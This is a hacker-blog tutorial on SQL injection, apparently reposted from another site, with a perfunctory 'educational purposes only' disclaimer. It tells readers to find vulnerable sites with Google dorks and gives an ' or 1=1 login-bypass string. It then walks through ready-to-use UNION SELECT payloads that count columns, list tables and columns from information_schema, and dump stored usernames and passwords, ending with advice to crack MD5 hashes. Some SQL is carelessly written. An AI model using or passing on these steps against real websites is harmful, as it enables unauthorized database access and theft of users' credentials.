SQL Injection

SQL Injection is a technique in which the hacker inserts SQL codes into a web Form to get Sensitive information like (User Name , Passwords). In fact, it is a technique to access the database of the website without authorization.

The SQL query looks like this in a database : 

SELECT * FROM users
WHERE Login Name = $_GET [‘Login Name’]
AND password = $_GET [‘password’]

After entering username and password , say admin and admin , then query becomes 

SELECT * FROM users
WHERE Login Name = admin
AND password = admin

HOW TO FIND A SITE VULNERABLE TO SQL INJECTION ?

Google is our friend. So, search using the following terms.

Inurl:admin login.asp
Inurl:login.asp

etc.. 

For complete list of Google Hacking keywords, go here. These are famously called as Google Dorks. All you need is a basic knowledge of advanced google searching.

1. Use a known username or admin.
2. Enter the string  ' or 1=1 – –    into the password box.
3. Submit.

.If you want to find SQLi vulnerability on a particular website, then also you can use google dorks.

To do this add a single quote(‘) at the end of the URL. If you get an error or blank page, the site is vulnerable to SQL injection.

 For example, if  the url is www.examplesite.com/view.php?id=47 then it should become www.examplesite.com/view.php?id=47' 

When you add single quote at the end of the URL, some data of the page is missing. Hence we can determine that it is vulnerable to SQl injection.

FINDING OUT THE NUMBER OF COLUMNS :

We can find this by simply adding “order by “ query at the end :

www.examplesite.com/view.php?id=47

 order by 1

—
It should return the page with no error.

Now add one more column to the above query. It looks like

www.examplesite.com/view.php?id=47 order by 2—

We should increase the count until we get an error. When we get an error, it means that there are no more columns to return the results.

Let us say we got an error at the following query.

www.examplesite.com/view.php?id=47 order by 10—

It means that the site has 9 columns.

 HOW TO FIND MOST VULNERABLE COLUMN :

www.examplesite.com/view.php?id=47 union select 1,2,3,4,5,6,7,8,9—

It should return the most vulnerable columns.

Some times it may not display the columns on your page. In such cases add ‘-‘ without quotes before 

your id number. This is to call a non existing page to display your data. i.e.,

www.examplesite.com/view.php?id=-47 union select 1,2,3,4,5,6,7,8,9—

WHAT ARE THE TABLES IN THE DATABASE ?

www.examplesite.com/view.php?id=-47 union select 1,table_name ,3,4,5,6,7,8,9 from information_schema.tables—

It gives us a list of tables.

Now search for the tables you are interested in. It means, a hacker generally looks for the tables that contain usernames and passwords.

So, Now we got the table. What next ? It is columns.

HOW TO FIND OUT THE COLUMN NAMES ?

www.

examplesite

.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from information_schema.columns where table_name=’yourtablename’—

Here, 'yourtablename' refers to the table which you selected recently.

it displays all the column names from the table

Let us extract the data now.

www.examplesite.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from yourtablename—

Here column_name refers to the desired columname say usernames.

Similarly, extract the passwords by changing column name.

Many websites encrypt the passwords unsing some encryption techniques like MD5 etc,. So decrypt them using decryptors.

Via : 101hacker

Note : FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR THE CONSEQUENCES.
If you enjoyed this post, make sure you subscribe to my RSS feed! Comments are encouraged